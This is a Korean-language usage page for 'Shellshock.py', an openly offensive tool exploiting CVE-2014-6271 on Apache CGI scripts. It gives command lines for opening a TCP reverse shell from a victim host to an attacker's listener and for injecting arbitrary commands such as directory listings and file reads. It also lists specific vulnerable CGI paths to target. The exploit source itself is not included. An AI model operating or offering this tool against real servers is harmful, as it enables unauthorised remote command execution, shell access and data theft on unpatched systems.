
[CVE-2014-6271] Apache Shellshock 원격 명령어 주입 도구 - 빠른 리버스 셸 및 파일 탐색용
[CVE-2014-6271] 빠른 리버스 셸 및 파일 탐색을 위한 Apache Shellshock 원격 명령 삽입 도구
Shellshock Apache 원격 익스플로잇
사용법:
./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"
변수:
피해자:
rhost => 피해자 IP
rport => 피해자 포트
공격자 (리버스 셸용):
lhost => 공격자 IP
lport => 리버스 셸을 위한 공격자 포트
에코:
echo => 주입할 사용자 정의 명령
예시:
echo="ls -la"
echo="cat file.txt"
구성:
pages => 특정 취약한 CGI 페이지
익스플로잇 가능한 페이지:
[0] /cgi-sys/entropysearch.cgi",
[1] /cgi-sys/defaultwebpage.cgi",
[2] /cgi-mod/index.cgi",
[3] /cgi-bin/test.cgi",
[4] /cgi-bin-sdb/printenv
페이로드:
"reverse" => (유닉스 범용) TCP 리버스 셸 (필요: rhost, lhost, lport)
"files" => 파일 읽기 및 탐색 (필요: rhost, echo)
Filip Studený 제작